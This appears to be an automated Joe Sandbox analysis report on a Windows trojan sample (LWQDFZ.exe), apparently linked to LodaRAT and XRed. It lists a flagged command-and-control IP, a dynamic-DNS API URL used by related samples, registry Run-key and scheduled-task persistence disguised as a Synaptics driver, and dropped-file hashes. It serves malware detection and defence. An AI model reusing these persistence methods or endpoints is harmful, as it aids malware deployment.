                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs

                                                                                                Public IPs

                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                142.250.185.78
                                                                                                		docs.google.comUnited States
                                                                                                		15169GOOGLEUSfalse
                                                                                                172.111.138.100
                                                                                                		unknownUnited States
                                                                                                		3223VOXILITYGBtrue
                                                                                                142.250.186.97
                                                                                                		drive.usercontent.google.comUnited States
                                                                                                		15169GOOGLEUSfalse
                                                                                                69.42.215.252
                                                                                                		freedns.afraid.orgUnited States
                                                                                                		17048AWKNET-LLCUSfalse

                                                                                                General Information

                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                Analysis ID:1582337
                                                                                                Start date and time:2024-12-30 11:24:12 +01:00
                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 11m 24s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                Number of analysed new started processes analysed:43
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:0
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Sample name:LWQDFZ.exe
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.expl.evad.winEXE@22/80@11/4
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 66.7%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 99%
                                                                                                • Number of executed functions: 89
                                                                                                • Number of non-executed functions: 290
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .exe

                                                                                                Warnings

                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                • Excluded IPs from analysis (whitelisted): 52.109.76.240, 52.113.194.132, 184.28.90.27, 20.42.65.90, 20.42.65.92, 20.42.73.29, 20.189.173.21, 40.126.32.76, 4.175.87.197, 23.206.229.209, 13.107.253.45
                                                                                                • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, onedscolprdeus14.eastus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, www.bing.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, neu-azsc-config.officeapps.live.com, onedsblobprdeus17.eastus.cloudapp.azure.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com,
                                                                                                • Execution Graph export aborted for target Synaptics.exe, PID 7464 because there are no executed function
                                                                                                • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                • VT rate limit hit for: LWQDFZ.exe

                                                                                                Simulations

                                                                                                Behavior and APIs

                                                                                                TimeTypeDescription
                                                                                                05:25:22API Interceptor469x Sleep call for process: Synaptics.exe modified
                                                                                                05:26:30API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                                10:25:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MHDFGY "C:\Users\user\AppData\Roaming\Windata\KQNALS.exe"
                                                                                                10:25:15Task SchedulerRun new task: MHDFGY.exe path: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe
                                                                                                10:25:24AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                10:25:32AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MHDFGY "C:\Users\user\AppData\Roaming\Windata\KQNALS.exe"
                                                                                                10:25:42AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MHDFGY.lnk

                                                                                                Joe Sandbox View / Context

                                                                                                IPs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                172.111.138.100KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                  Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                    AYRASY.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                        mmi8nLybam.exeGet hashmaliciousLodaRATBrowse
                                                                                                          Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                              New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                  Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    69.42.215.252JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    AYRASY.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

                                                                                                                    Domains

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    s-part-0017.t-0009.fb-t-msedge.netSalary Amendment.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 13.107.253.45
                                                                                                                    IcisR4FC8n.dllGet hashmaliciousUnknownBrowse
                                                                                                                    • 13.107.253.45
                                                                                                                    https://thaykinhgiasoc.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU9USlBZakE9JnVpZD1VU0VSMTcxMDIwMjRVMDAxMDE3NDA=N0123NGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                    • 13.107.253.45
                                                                                                                    file.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                    • 13.107.253.45
                                                                                                                    pzPO97QouM.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                    • 13.107.253.45
                                                                                                                    Multi Graphics Inc CustomerVendor Form.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 13.107.253.45
                                                                                                                    OaSEt8i2jE.exeGet hashmaliciousNjratBrowse
                                                                                                                    • 13.107.253.45
                                                                                                                    https://eu.docworkspace.com/d/sIGWvrvOeAYXvpLkGGet hashmaliciousUnknownBrowse
                                                                                                                    • 13.107.253.45
                                                                                                                    PORgjGswYg.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 13.107.253.45
                                                                                                                    https://login-zendesk-account.servz.com.pkGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 13.107.253.45
                                                                                                                    freedns.afraid.orgKOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    AYRASY.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252

                                                                                                                    ASNs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    VOXILITYGBKOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    AYRASY.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    mmi8nLybam.exeGet hashmaliciousLodaRATBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 104.250.189.221
                                                                                                                    Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    AWKNET-LLCUSJPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    AYRASY.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252

                                                                                                                    JA3 Fingerprints

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    37f463bf4616ecd445d4a1937da06e19JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 142.250.186.97
                                                                                                                    • 142.250.185.78
                                                                                                                    KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 142.250.186.97
                                                                                                                    • 142.250.185.78
                                                                                                                    Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 142.250.186.97
                                                                                                                    • 142.250.185.78
                                                                                                                    AYRASY.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 142.250.186.97
                                                                                                                    • 142.250.185.78
                                                                                                                    222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 142.250.186.97
                                                                                                                    • 142.250.185.78
                                                                                                                    Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 142.250.186.97
                                                                                                                    • 142.250.185.78
                                                                                                                    zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                                    • 142.250.186.97
                                                                                                                    • 142.250.185.78
                                                                                                                    setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                    • 142.250.186.97
                                                                                                                    • 142.250.185.78
                                                                                                                    Lets-x64.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                    • 142.250.186.97
                                                                                                                    • 142.250.185.78

                                                                                                                    Dropped Files

                                                                                                                    No context

                                                                                                                    Created / dropped Files

                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):118
                                                                                                                    Entropy (8bit):3.5700810731231707
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                    MD5:573220372DA4ED487441611079B623CD
                                                                                                                    SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                    SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                    SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                    Malicious:false
                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_42a5b175d638db45a25b5883a74cc3f4b3b9e12_455b7b6e_633177b0-2efd-45f8-8df8-3cf1e17fec7f\Report.wer

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):65536
                                                                                                                    Entropy (8bit):1.133654487022306
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:88SVpsUIm00NVEHYDzJDzqjLOA/1czxwzuiFJ9Z24IO8EKDzy:WyUVNVEHYJqjUKzuiFJ9Y4IO8zy
                                                                                                                    MD5:EAC608AB36B4FD16DF65CE56CB1FFAC3
                                                                                                                    SHA1:4DBE1BD7F13BA49DC977801FB34FF010E2D6B91D
                                                                                                                    SHA-256:6F64608D7A352B3F5F4040974FAE95FFF54C54D20D2EBCD0C6EAAC442E0F3554
                                                                                                                    SHA-512:67CB980514BB485E9A24F822EB32DB81C905790FB40F58E59D0C0C922B727BCB2A3D432F7B93C351DA6C51841B935690A4791E256078565DBD6054FC26979060
                                                                                                                    Malicious:false
                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.7.9.7.2.1.4.1.4.5.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.7.9.8.8.5.3.2.0.8.1.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.3.3.1.7.7.b.0.-.2.e.f.d.-.4.5.f.8.-.8.d.f.8.-.3.c.f.1.e.1.7.f.e.c.7.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.a.1.e.e.2.3.5.-.5.7.6.0.-.4.8.7.7.-.8.b.e.c.-.1.e.b.0.9.e.7.0.8.7.6.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.2.8.-.0.0.0.1.-.0.0.1.4.-.b.9.1.0.-.0.b.1.b.a.5.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.e.2.f.4.7.6.0.1.f.c.a.d.6.2.1.8.3.9.3.7.5.6.7.2.1.0.b.5.0.6.2.b.0.7.5.0.f.a.7.0.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_d4be583835f61739e072b3b8de18c3e8e49b1d_455b7b6e_0ac2fae2-364c-42c4-842a-f30c85e99dfe\Report.wer

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):65536
                                                                                                                    Entropy (8bit):1.133427304398768
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:n5WSVpsrImL0jMNtDzJDzqjLOA/1czxwzuiFJ9Z24IO8EKDzy:PyryjMNtJqjUKzuiFJ9Y4IO8zy
                                                                                                                    MD5:A09E313D55A86A3320E3D8BAB9EEAB45
                                                                                                                    SHA1:E7953E82EC047B9CCF4BBDCEA7957A7AD5A76578
                                                                                                                    SHA-256:7AC197136C3A6F90B64E76C8CA6ABB7D0F6EF3430D68D61236C0D0CE4010688C
                                                                                                                    SHA-512:C4AFC1652B43EA86C47D2754D86EAEB8FFCE6322F5478E59323580D48AD2CB546D01CF6720BA8EF82C88FE6CA7EC20DB9008EDFBFBF417E64F6F0509B45963BE
                                                                                                                    Malicious:false
                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.7.9.9.1.1.7.9.0.2.4.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.8.0.1.3.3.9.7.7.6.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.a.c.2.f.a.e.2.-.3.6.4.c.-.4.2.c.4.-.8.4.2.a.-.f.3.0.c.8.5.e.9.9.d.f.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.6.2.7.8.8.6.9.-.5.e.e.7.-.4.3.b.d.-.9.d.2.d.-.a.a.3.3.f.d.4.e.9.3.1.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.2.8.-.0.0.0.1.-.0.0.1.4.-.b.9.1.0.-.0.b.1.b.a.5.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.e.2.f.4.7.6.0.1.f.c.a.d.6.2.1.8.3.9.3.7.5.6.7.2.1.0.b.5.0.6.2.b.0.7.5.0.f.a.7.0.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER2B61.tmp.WERInternalMetadata.xml

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):6318
                                                                                                                    Entropy (8bit):3.7193997233515925
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:R6l7wVeJ0xp6u8YiS6xbprG89bxfsf77m:R6lXJ26u8YCxJxEfG
                                                                                                                    MD5:ACAD88DDC12F162A005F9F85F3B06C67
                                                                                                                    SHA1:06134C7CB21106D7917AB23B89DE832B21D6C5D4
                                                                                                                    SHA-256:F6DEE967D08F8706B3762BBBA37D26C0B7818379FAC8B05E42C081125F04D39F
                                                                                                                    SHA-512:F555EDE16962AF1100670D039A29DCA88F5A5852318B141FEC7E59EC4ABA506665C64AB171CD002998BDCBADDD66220ACEBAED7A9DB5EE90A32E96B8815496FA
                                                                                                                    Malicious:false
                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.6.4.<./.P.i.

                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER2BA0.tmp.xml

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):4572
                                                                                                                    Entropy (8bit):4.443731862570026
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:cvIwWl8zs4EJg77aI9OJWpW8VYsYm8M4JFmFI+q84HJZydd:uIjfhI7c47VgJZVJZydd
                                                                                                                    MD5:3CC730776AA7F3D5444FA457E1E2396D
                                                                                                                    SHA1:63900B4DA120865FDFA7355BB05B324F5997F1F9
                                                                                                                    SHA-256:B6249B365753CC3B86CC20FF29E6E7F1E2DD775EE41677DEB29DF1D08BCFFF81
                                                                                                                    SHA-512:33CB77D2C083A07C48841B24F861F7A99A2970EEDD1EE5BA2C7A8ABCF3F005549A36F8A340CA947975C1420A90A398BF8FA172EEA8B04059B8F60D738C6571AB
                                                                                                                    Malicious:false
                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653849" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER36CA.tmp.dmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Mon Dec 30 10:26:38 2024, 0x1205a4 type
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):6206534
                                                                                                                    Entropy (8bit):2.030341953035143
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:pbvAteNQush69BahbXHoEdC5xCgY8V2QGKLACs2TvqaM/c6EAzdVpkrIBS:pb4tgwdF0oynS/Wd
                                                                                                                    MD5:037233FC1B8924BCE83AEC0CEDD4F22A
                                                                                                                    SHA1:D858D1E184FD3015DDBBD810ED917CA734173414
                                                                                                                    SHA-256:D6D17E764B51BA4441348DD3E4C7510FCDCD667BC8426BC3EFE3814D50483620
                                                                                                                    SHA-512:B88647098EAD747035F7185E93DC0DBFE9430D28E365777686E525FF2B82590ABD85229C7194D17218C1B5B556B2C62B1556CC99EF42E45499C517AE88F1253F
                                                                                                                    Malicious:false
                                                                                                                    Preview:MDMP..a..... .......^urg.............W...............^......$...P~......................`.......8...........T.................\.........t~..........`...............................................................................eJ..............GenuineIntel............T.......(....urg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8C5D.tmp.WERInternalMetadata.xml

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
